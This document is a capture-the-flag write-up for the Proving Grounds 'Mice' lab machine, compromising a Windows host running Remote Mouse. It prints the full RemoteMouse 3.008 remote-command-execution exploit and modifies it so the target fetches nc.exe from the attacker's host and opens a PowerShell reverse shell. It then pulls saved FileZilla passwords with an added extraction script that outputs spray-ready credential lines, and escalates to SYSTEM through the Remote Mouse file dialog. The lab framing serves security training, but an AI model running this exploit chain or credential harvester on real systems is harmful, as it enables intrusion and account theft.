Mice
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.182.199
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 13:19 EST
Nmap scan report for 192.168.182.199
Host is up, received echo-reply ttl 125 (0.13s latency).
Scanned at 2025-11-10 13:19:45 EST for 242s
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
1978/tcp open remotemouse syn-ack ttl 125 Emote Remote Mouse
1979/tcp open unisql-java? syn-ack ttl 125
1980/tcp open pearldoc-xact? syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
|_ssl-date: 2025-11-10T18:23:48+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Issuer: commonName=Remote-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-08-25T10:09:25
| Not valid after: 2026-02-24T10:09:25
| MD5: ee3d:e4de:8e91:a5b4:7115:34cb:986a:f8bd
| SHA-1: 093c:db26:68db:b772:9089:ad5a:833b:90f8:d929:4eb7
| -----BEGIN CERTIFICATE-----
| MIIC1jCCAb6gAwIBAgIQdK7WCoPG665IL5mbwZdubTANBgkqhkiG9w0BAQsFADAU
<snipped>
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: REMOTE-PC
| NetBIOS_Domain_Name: REMOTE-PC
| NetBIOS_Computer_Name: REMOTE-PC
| DNS_Domain_Name: Remote-PC
| DNS_Computer_Name: Remote-PC
| Product_Version: 10.0.19041
|_ System_Time: 2025-11-10T18:23:19+00:00
7680/tcp open pando-pub? syn-ack ttl 125
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
We have four open ports that nmap cannot confidently identify (1978, 1979, 1980 and 7680), one of which it fingerprints as Emote Remote Mouse, plus RDP on 3389.
Let's connect to the first unknown port (1978) and see whether it sends a banner:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nv 192.168.182.199 1978
(UNKNOWN) [192.168.182.199] 1978 (?) open
SIN 15win nop nop 300
I searched for that banner online and found this:

nmap had already labelled port 1978 as Emote Remote Mouse, which matches.
We do not know the exact version installed, but we will pull the public exploit and try it out:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit remotemouse
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
RemoteMouse 3.008 - Arbitrary Remote Command Execution | windows/remote/46697.py
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ searchsploit -m 46697
Exploit: RemoteMouse 3.008 - Arbitrary Remote Command Execution
URL: https://www.exploit-db.com/exploits/46697
Path: /usr/share/exploitdb/exploits/windows/remote/46697.py
Codes: N/A
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Mice/46697.py
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ cat 46697.py
<snipped>
#!/usr/bin/python2
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from time import sleep
from sys import argv

# Fingerprint check: RemoteMouse answers a plain TCP connect on 1978 with this banner.
def Ping(ip):
    try:
        target = socket(AF_INET, SOCK_STREAM)
        target.settimeout(5)
        target.connect((ip, 1978))
        response=target.recv(1048)
        target.close()
        if response=="SIN 15win nop nop 300":
            return True
        else: return False
    except:
        print("ERROR: Request timed out")

# Every mouse and keyboard action is an unauthenticated UDP datagram to port 1978.
# Movement is relative: one "mos 5m dx dy" datagram per pixel step.
def MoveMouse(x,y,ip):
    def SendMouse(command,times,ip):
        for x in range(times):
            target = socket(AF_INET, SOCK_DGRAM)
            target.sendto(command,(ip,1978))
            sleep(0.001)
    if x>0:
        command="mos 5m 1 0"
        SendMouse(command,x,ip)
    elif x<0:
        x=x*-1
        command="mos 5m -1 0"
        SendMouse(command,x,ip)
    if y>0:
        command="mos 5m 0 1"
        SendMouse(command,y,ip)
    elif y<0:
        y=y*-1
        command="mos 6m 0 -1"
        SendMouse(command,y,ip)

# Button events are the click command with a " d" (down) or " u" (up) suffix.
def MousePress(command,ip,action="click"):
    if action=="down":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
    elif action=="up":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" u"),(ip,1978))
    elif action=="click":
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto((command+" d"),(ip,1978))
        target.sendto((command+" u"),(ip,1978))
    else: raise Exception('MousePress: No action named "'+str(action)+'"')

# Types a string one keystroke at a time into whatever window currently has focus.
# Only characters present in the table below can be sent.
def SendString(string,ip):
    for char in string:
        target = socket(AF_INET, SOCK_DGRAM)
        target.sendto(characters[char],(ip,1978))
        sleep(0.5)

class mouse:
    leftClick="mos 5R l"
    rightClick="mos 5R r"
    middleClick="mos 5R m"

characters={
    "A":"key 8[ras]116", "B":"key 8[ras]119", "C":"key 8[ras]118", "D":"key 8[ras]113", "E":"key 8[ras]112",
    "F":"key 8[ras]115", "G":"key 8[ras]114", "H":"key 8[ras]125", "I":"key 8[ras]124", "J":"key 8[ras]127",
    "K":"key 8[ras]126", "L":"key 8[ras]121", "M":"key 8[ras]120", "N":"key 8[ras]123", "O":"key 8[ras]122",
    "P":"key 8[ras]101", "Q":"key 8[ras]100", "R":"key 8[ras]103", "S":"key 8[ras]102", "T":"key 7[ras]97",
    "U":"key 7[ras]96", "V":"key 7[ras]99", "W":"key 7[ras]98", "X":"key 8[ras]109", "Y":"key 8[ras]108",
    "Z":"key 8[ras]111",
    "a":"key 7[ras]84", "b":"key 7[ras]87", "c":"key 7[ras]86", "d":"key 7[ras]81", "e":"key 7[ras]80",
    "f":"key 7[ras]83", "g":"key 7[ras]82", "h":"key 7[ras]93", "i":"key 7[ras]92", "j":"key 7[ras]95",
    "k":"key 7[ras]94", "l":"key 7[ras]89", "m":"key 7[ras]88", "n":"key 7[ras]91", "o":"key 7[ras]90",
    "p":"key 7[ras]69", "q":"key 7[ras]68", "r":"key 7[ras]71", "s":"key 7[ras]70", "t":"key 7[ras]65",
    "u":"key 7[ras]64", "v":"key 7[ras]67", "w":"key 7[ras]66", "x":"key 7[ras]77", "y":"key 7[ras]76",
    "z":"key 7[ras]79",
    "1":"key 6[ras]4", "2":"key 6[ras]7", "3":"key 6[ras]6", "4":"key 6[ras]1", "5":"key 6[ras]0",
    "6":"key 6[ras]3", "7":"key 6[ras]2", "8":"key 7[ras]13", "9":"key 7[ras]12", "0":"key 6[ras]5",
    "\n":"key 3RTN", "\b":"key 3BAS", " ":"key 7[ras]21",
    "+":"key 7[ras]30", "=":"key 6[ras]8", "/":"key 7[ras]26", "_":"key 8[ras]106", "<":"key 6[ras]9",
    ">":"key 7[ras]11", "[":"key 8[ras]110", "]":"key 8[ras]104", "!":"key 7[ras]20", "@":"key 8[ras]117",
    "#":"key 7[ras]22", "$":"key 7[ras]17", "%":"key 7[ras]16", "^":"key 8[ras]107", "&":"key 7[ras]19",
    "*":"key 7[ras]31", "(":"key 7[ras]29", ")":"key 7[ras]28", "-":"key 7[ras]24", "'":"key 7[ras]18",
    '"':"key 7[ras]23", ":":"key 7[ras]15", ";":"key 7[ras]14", "?":"key 7[ras]10", "`":"key 7[ras]85",
    "~":"key 7[ras]75", "\\":"key 8[ras]105", "|":"key 7[ras]73", "{":"key 7[ras]78", "}":"key 7[ras]72",
}

# Drag the cursor to the bottom-left corner (Start button), click it, type the
# command into the Start menu search box and press Enter.
def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString("calc.exe",ip)
    sleep(1)
    SendString("\n",ip)
    print("SUCCESS! Process calc.exe has run on target",ip)

def main():
    try:
        targetIP=argv[1]
    except:
        print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
        exit()
    if Ping(targetIP)==True:
        PopCalc(targetIP)
    else:
        print("ERROR: Target machine is not running RemoteMouse")
        exit()

if __name__=="__main__":
    main()
I will edit the command that PopCalc() types (the SendString("calc.exe",ip) line) to run what I need on the target; the success message will still mention calc.exe because only the typed string changes.
First, test which ports the target can reach back to us:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ...
Edited line in PopCalc():
SendString("curl http://192.168.45.187:80/test.txt",ip)
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 60231
GET /test HTTP/1.1
Host: 192.168.45.187
User-Agent: curl/7.55.1
Accept: */*
Exploitation:
The target can reach us on port 80, so let's upload netcat the same way and get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Edited line in PopCalc():
SendString("curl http://192.168.45.187:80/nc.exe -o C:\\Windows\\Tasks\\nc.exe",ip)
Rerun the script:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.182.199 - - [10/Nov/2025 14:23:51] "GET /nc.exe HTTP/1.1" 200 -
Now let's get a reverse shell:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
Edited line in PopCalc():
SendString("C:\\Windows\\Tasks\\nc.exe 192.168.45.187 80 -e powershell",ip)
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ python2 46697.py 192.168.182.199
('SUCCESS! Process calc.exe has run on target', '192.168.182.199')
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.182.199] 58796
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\WINDOWS\system32> whoami
remote-pc\divine
Post-Exploitation:
During local enumeration we find the FileZilla FTP client installed on the target:
PS C:\WINDOWS\system32> cd \
PS C:\> dir "Program Files"
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 6/21/2021 3:33 AM Common Files
d----- 12/6/2021 8:37 PM FileZilla FTP Client
d----- 10/19/2021 6:48 AM Internet Explorer
d----- 10/19/2021 6:30 AM Microsoft Update Health Tools
d----- 12/7/2019 1:14 AM ModifiableWindowsApps
d----- 6/21/2021 3:34 AM VMware
d----- 6/21/2021 3:33 AM Windows Defender
d----- 12/6/2021 8:21 PM Windows Defender Advanced Threat Protection
d----- 9/1/2021 8:40 AM Windows Mail
d----- 10/19/2021 6:48 AM Windows Media Player
d----- 12/7/2019 1:54 AM Windows Multimedia Platform
d----- 12/7/2019 1:50 AM Windows NT
d----- 6/18/2021 5:50 AM Windows Photo Viewer
d----- 12/7/2019 1:54 AM Windows Portable Devices
d----- 12/7/2019 1:31 AM Windows Security
d----- 12/7/2019 1:31 AM WindowsPowerShell
FileZilla stores saved and recently used server logins, passwords included, in XML files in the user's profile. I searched online for the path of those files:


They are under the current user's AppData\Roaming\FileZilla directory:
PS C:\> cd \Users\divine\AppData\Roaming
PS C:\Users\divine\AppData\Roaming> dir
Directory: C:\Users\divine\AppData\Roaming
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/6/2021 8:39 PM Adobe
d----- 12/6/2021 8:40 PM FileZilla
d---s- 11/10/2025 11:01 AM Microsoft
PS C:\Users\divine\AppData\Roaming> cd FileZilla
PS C:\Users\divine\AppData\Roaming\FileZilla> dir
Directory: C:\Users\divine\AppData\Roaming\FileZilla
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/6/2021 8:40 PM 18963 filezilla.xml
-a---- 12/6/2021 8:40 PM 451 layout.xml
-a---- 12/6/2021 8:40 PM 28672 queue.sqlite3
-a---- 12/6/2021 8:40 PM 458 recentservers.xml
In recentservers.xml:
PS C:\Users\divine\AppData\Roaming\FileZilla> type recentservers.xml
<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>
The password is only base64-encoded, not encrypted. I will decode it, check whether it is still valid on this host, and if so authenticate over RDP with xfreerdp3:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ echo 'Q29udHJvbEZyZWFrMTE=' | base64 -d
ControlFreak11
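The same recovery, generalised to every `<Server>` entry in a FileZilla XML file, as an added example that is not part of the original writeup or of FileZilla itself. The embedded sample is the recentservers.xml shown above; sitemanager.xml nests its `<Server>` elements under `<Servers>` and folders, which the recursive walk also covers. Treating a `<Pass>` element without `encoding="base64"` as literal text is an assumption.

```python
# Added example: recover stored logins from FileZilla's recentservers.xml /
# sitemanager.xml. Sample below is the recentservers.xml captured on the target.
import base64
import xml.etree.ElementTree as ET

SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.54.1" platform="windows">
<RecentServers>
<Server>
<Host>ftp.pg</Host>
<Port>21</Port>
<Protocol>0</Protocol>
<Type>0</Type>
<User>divine</User>
<Pass encoding="base64">Q29udHJvbEZyZWFrMTE=</Pass>
<Logontype>1</Logontype>
<PasvMode>MODE_DEFAULT</PasvMode>
<EncodingType>Auto</EncodingType>
<BypassProxy>0</BypassProxy>
</Server>
</RecentServers>
</FileZilla3>"""


def decode_pass(elem):
    """<Pass encoding="base64"> holds base64; anything else is assumed literal."""
    if elem is None or not elem.text:
        return None
    if elem.get("encoding") == "base64":
        return base64.b64decode(elem.text.strip()).decode("utf-8", "replace")
    return elem.text


def extract_logins(xml_text):
    """Return [(host, port, user, password)] for every <Server> in the document."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    creds = []
    for srv in root.iter("Server"):          # recursive: RecentServers and site-manager folders
        host = srv.findtext("Host")
        port = int(srv.findtext("Port") or 0)
        user = srv.findtext("User")
        creds.append((host, port, user, decode_pass(srv.find("Pass"))))
    return creds


def to_spray_lines(creds):
    """Deduplicated user:password lines, ready for nxc/hydra style reuse checks."""
    return sorted({"%s:%s" % (u, p) for _, _, u, p in creds if u and p})


if __name__ == "__main__":
    import sys
    # usage: fz_creds.py [path\to\recentservers.xml]; defaults to the embedded sample
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE
    for host, port, user, pw in extract_logins(text):
        print("%s:%d  %s / %s" % (host, port, user, pw))
```

The lesson for the defensive side is the same as for the attacker: without a FileZilla master password these files hand over every saved login to anyone who can read the user's profile, and as the next step shows the FTP password was reused for the Windows account.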
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ nxc rdp 192.168.182.199 -u divine -p ControlFreak11
RDP 192.168.182.199 3389 REMOTE-PC [*] Windows 10 or Windows Server 2016 Build 19041 (name:REMOTE-PC) (domain:Remote-PC) (nla:False)
RDP 192.168.182.199 3389 REMOTE-PC [+] Remote-PC\divine:ControlFreak11 (Pwn3d!)
It is valid.
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Mice]
└─$ xfreerdp3 /v:192.168.182.199 /u:divine /p:ControlFreak11 /dynamic-resolution /clipboard
<snipped>
From the same search, Remote Mouse can also be abused for local privilege escalation: the file-picker dialog reachable from its settings belongs to a privileged Remote Mouse process, so anything launched from that dialog inherits its privileges:


We will follow these steps.
If the tray icons are not visible in the RDP session, open Task Manager and restart Windows Explorer.
First, right-click the Remote Mouse tray icon and open Preferences:

Go to settings:

Click Change (shown above).

In the address bar of the file dialog that opens, type cmd.exe and press Enter:

The cmd.exe spawned from that dialog runs as SYSTEM, which completes the privilege escalation.
Get the flags:
C:\Users\divine>type Desktop\local.txt
5948fd6324cdc146cc850881952f1d4d
C:\Users\divine>type \Users\Administrator\Desktop\proof.txt
fb33cfb7a57330065acc2649125f7b39